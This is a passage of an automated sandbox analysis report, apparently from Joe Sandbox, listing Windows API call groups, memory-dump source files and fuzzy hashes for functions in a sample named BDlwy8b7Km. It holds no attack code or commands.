                                                  APIs
                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005A9693
                                                  • SelectObject.GDI32(?,00000000), ref: 005A96A2
                                                  • BeginPath.GDI32(?), ref: 005A96B9
                                                  • SelectObject.GDI32(?,00000000), ref: 005A96E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: 0fd3c0c2f3cd9c001e1e6b55fd071027d777b58f63bddfd48616f780cd53141f
                                                  • Instruction ID: 4fa1b58a276c55c676245f32627023ed1bafc28d2095c122b5e8c52c7dcefc55
                                                  • Opcode Fuzzy Hash: 0fd3c0c2f3cd9c001e1e6b55fd071027d777b58f63bddfd48616f780cd53141f
                                                  • Instruction Fuzzy Hash: AF216D30802219EBEB119F65DC197AD3FAABF42325F181316F410AB1A0D3B05891CFD4
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 1c61101f5e4b85bdb7a71536c1a91db29c01f0403ca22fa40e53fda468e991a1
                                                  • Instruction ID: 8c3e4d3d07322c1fd2ba9fa75129a9d8db1765505c310c108703dfa236c7a0dc
                                                  • Opcode Fuzzy Hash: 1c61101f5e4b85bdb7a71536c1a91db29c01f0403ca22fa40e53fda468e991a1
                                                  • Instruction Fuzzy Hash: BF01D661286E1DBB924862119D42EFB7B9DFB603D4B404430FF069A241F624FD1086A4
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,005BF2DE,005C3863,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6), ref: 005C2DFD
                                                  • _free.LIBCMT ref: 005C2E32
                                                  • _free.LIBCMT ref: 005C2E59
                                                  • SetLastError.KERNEL32(00000000,00591129), ref: 005C2E66
                                                  • SetLastError.KERNEL32(00000000,00591129), ref: 005C2E6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 52c429a4d11d6c55f1a043a29e0057cceb6606161428affb5906af5de2a69251
                                                  • Instruction ID: 0c79eaa9748313d3b83a0dada578af86f7a1994ab60028ae2cda666c43d1f995
                                                  • Opcode Fuzzy Hash: 52c429a4d11d6c55f1a043a29e0057cceb6606161428affb5906af5de2a69251
                                                  • Instruction Fuzzy Hash: D801F436205A056FDB22A7F56C49F3F2E6EBBD13B5F21882CF425B2192EA308C018020
                                                  APIs
                                                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?,?,005F035E), ref: 005F002B
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0046
                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0054
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?), ref: 005F0064
                                                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0070
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                  • String ID:
                                                  • API String ID: 3897988419-0
                                                  • Opcode ID: 5246cd0ebb5bf50e90d36169c75e62fd7a9349b18b4e183a4e0cc2089a74bff8
                                                  • Instruction ID: 525f7044c93b478889f2979391e74a27ac908ed2eb3482908e686ae221040337
                                                  • Opcode Fuzzy Hash: 5246cd0ebb5bf50e90d36169c75e62fd7a9349b18b4e183a4e0cc2089a74bff8
                                                  • Instruction Fuzzy Hash: DA01BC72600608BBDB204F69DC08BBE7EAEEB44361F18A424FA01D2251DB78DD409BA0
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 005FE997
                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 005FE9A5
                                                  • Sleep.KERNEL32(00000000), ref: 005FE9AD
                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 005FE9B7
                                                  • Sleep.KERNEL32 ref: 005FE9F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  • Opcode ID: 6316f1b5581585844bce2608ef09197c60b86e44e40c6bd77ae62d59407621c3
                                                  • Instruction ID: b4de012c36858a3a70b4c460db367c077f35f81073d08375de4f66138de9a350
                                                  • Opcode Fuzzy Hash: 6316f1b5581585844bce2608ef09197c60b86e44e40c6bd77ae62d59407621c3
                                                  • Instruction Fuzzy Hash: 42015B31C01A2DDBCF109FE4DD4E6EDBB79BB09711F000546E602B2261CB749655C7A1
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005F1114
                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1120
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F112F
                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1136
                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005F114D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 842720411-0
                                                  • Opcode ID: 39550004226d5ee6bf0083071ea56fc8f9562f225486e9efababed910bf6c5ad
                                                  • Instruction ID: c6c2f77d6faa3971fbac6ccf78691fd8ba091febc60a7277a4274c9ebf6e2c3f
                                                  • Opcode Fuzzy Hash: 39550004226d5ee6bf0083071ea56fc8f9562f225486e9efababed910bf6c5ad
                                                  • Instruction Fuzzy Hash: 5A01F679600A09AFDB214BA5DC49E6A3F6EEF893A0B204419FA45D7260DB31DC11DAA0
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005F0FCA
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005F0FD6
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005F0FE5
                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005F0FEC
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005F1002
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: bca7c4ae276b8a0b2f4b48f565afa45767f601921ecf9302ac86b33daf6aa341
                                                  • Instruction ID: eb2246d9ada81b7af75a8ba0d30f2c654f9544302e1170c7ccda978ae4f43ce9
                                                  • Opcode Fuzzy Hash: bca7c4ae276b8a0b2f4b48f565afa45767f601921ecf9302ac86b33daf6aa341
                                                  • Instruction Fuzzy Hash: 5EF04F36100B05EBD7214FA4DC4EF5A3F6EFF89761F104414FA45C7251DA75DC518A60
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005F102A
                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005F1036
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005F1045
                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005F104C
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005F1062
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: bbac6543deff5b3d1dfcb7957047bee655176f416d9a08f279a2fa9fe23e0e71
                                                  • Instruction ID: 6d71fb72c48835c06ebd8324713c3574640ae33dfad2707022e6044a21bdaf75
                                                  • Opcode Fuzzy Hash: bbac6543deff5b3d1dfcb7957047bee655176f416d9a08f279a2fa9fe23e0e71
                                                  • Instruction Fuzzy Hash: 5DF04935200B05EBDB215FA5EC4DF6A3FAEFF89761F200424FA45CB250CA75D8918A60
                                                  APIs
                                                  • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 00600324
                                                  • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 00600331
                                                  • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 0060033E
                                                  • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 0060034B
                                                  • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 00600358
                                                  • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 00600365
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: d20f33cc6c965ac6a760cda87d7e02df0b4524d3f18bb9b483fd3dfcfb329f0d
                                                  • Instruction ID: 499289aaac5cdc63e053bbd767c515b0f01e440051d144e914816ecf8ea13a16
                                                  • Opcode Fuzzy Hash: d20f33cc6c965ac6a760cda87d7e02df0b4524d3f18bb9b483fd3dfcfb329f0d
                                                  • Instruction Fuzzy Hash: 0601E272800B029FD7399F66D880543F7F6BF503153148A3FD19252A70C371A944CF80
                                                  APIs
                                                  • _free.LIBCMT ref: 005CD752
                                                    • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                                                    • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
                                                  • _free.LIBCMT ref: 005CD764
                                                  • _free.LIBCMT ref: 005CD776
                                                  • _free.LIBCMT ref: 005CD788
                                                  • _free.LIBCMT ref: 005CD79A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 4b06ec0940798af1400c18a96ee425a889aaf4c57e01fd03bd1672ed66657718
                                                  • Instruction ID: 45b9e0e7fedf2cf525635835545538ac84094f4198b3444abfe921b0f4e5c684
                                                  • Opcode Fuzzy Hash: 4b06ec0940798af1400c18a96ee425a889aaf4c57e01fd03bd1672ed66657718
                                                  • Instruction Fuzzy Hash: 22F0C972544305AFC621EBA4F9C9E167FEAFB44721F95181DF049E7501C634F8808674
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 005F5C58
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 005F5C6F
                                                  • MessageBeep.USER32(00000000), ref: 005F5C87
                                                  • KillTimer.USER32(?,0000040A), ref: 005F5CA3
                                                  • EndDialog.USER32(?,00000001), ref: 005F5CBD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  • Opcode ID: 2b67fa70c6d89e519e19e4b53a38d9e75fec85f8ae27dbc303911068ced80b95
                                                  • Instruction ID: 1b0e1ec9d190b1762bb2d1a5f9d068d7ea4461bf9fa1c5691b688344c3b50830
                                                  • Opcode Fuzzy Hash: 2b67fa70c6d89e519e19e4b53a38d9e75fec85f8ae27dbc303911068ced80b95
                                                  • Instruction Fuzzy Hash: D2018630500F08ABEB305B14DD5EFBA7BB9BF00B05F001559A783A14E1EBF4AD898A90
                                                  APIs
                                                  • _free.LIBCMT ref: 005C22BE
                                                    • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                                                    • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
                                                  • _free.LIBCMT ref: 005C22D0
                                                  • _free.LIBCMT ref: 005C22E3
                                                  • _free.LIBCMT ref: 005C22F4
                                                  • _free.LIBCMT ref: 005C2305
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 88322c796865112167006c24cedbf2551a695331e5ddef3127c83ded5e565f04
                                                  • Instruction ID: 14517d736cc2e909d1418c15d770a6948e3708f9ebf4a42d03c039767eb5cecc
                                                  • Opcode Fuzzy Hash: 88322c796865112167006c24cedbf2551a695331e5ddef3127c83ded5e565f04
                                                  • Instruction Fuzzy Hash: FFF03A748402629FDB12AFA4BC05E093F6BB759761F04251EF818D72B1CBB00A91EFA4
                                                  APIs
                                                  • EndPath.GDI32(?), ref: 005A95D4
                                                  • StrokeAndFillPath.GDI32(?,?,005E71F7,00000000,?,?,?), ref: 005A95F0
                                                  • SelectObject.GDI32(?,00000000), ref: 005A9603
                                                  • DeleteObject.GDI32 ref: 005A9616
                                                  • StrokePath.GDI32(?), ref: 005A9631
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  • Opcode ID: 66d2db6fffbdd67fac61f29ec67d766eab863487fa938eb7b13d2a4a6b94fec8
                                                  • Instruction ID: 18685382fce011b7a2d7f91344880c162182a9aa6ca5075b735e140d1df194c8
                                                  • Opcode Fuzzy Hash: 66d2db6fffbdd67fac61f29ec67d766eab863487fa938eb7b13d2a4a6b94fec8
                                                  • Instruction Fuzzy Hash: 28F0C931405608EBEB265F66ED1D7683F66BB07332F08A314F4655A0F0C7B189A6DFA4
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: __freea$_free
                                                  • String ID: a/p$am/pm
                                                  • API String ID: 3432400110-3206640213
                                                  • Opcode ID: 81d1498de0e21d2a8345d9d8d2000750dcca600499f64a50a4179da04f32601b
                                                  • Instruction ID: 9bbd53b8a8b5dbc6fce543e05783c5237b759d50c8a2cbc304715ea83b5628b9
                                                  • Opcode Fuzzy Hash: 81d1498de0e21d2a8345d9d8d2000750dcca600499f64a50a4179da04f32601b
                                                  • Instruction Fuzzy Hash: D1D1E235900A46CFCB249FE8C849FBABFB1FB47B04F18495DE501AB642D2759D80CB99
                                                  APIs
                                                    • Part of subcall function 005B0242: EnterCriticalSection.KERNEL32(0066070C,00661884,?,?,005A198B,00662518,?,?,?,005912F9,00000000), ref: 005B024D
                                                    • Part of subcall function 005B0242: LeaveCriticalSection.KERNEL32(0066070C,?,005A198B,00662518,?,?,?,005912F9,00000000), ref: 005B028A
                                                    • Part of subcall function 005B00A3: __onexit.LIBCMT ref: 005B00A9
                                                  • __Init_thread_footer.LIBCMT ref: 00616238
                                                    • Part of subcall function 005B01F8: EnterCriticalSection.KERNEL32(0066070C,?,?,005A8747,00662514), ref: 005B0202
                                                    • Part of subcall function 005B01F8: LeaveCriticalSection.KERNEL32(0066070C,?,005A8747,00662514), ref: 005B0235
                                                    • Part of subcall function 0060359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006035E4
                                                    • Part of subcall function 0060359C: LoadStringW.USER32(00662390,?,00000FFF,?), ref: 0060360A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
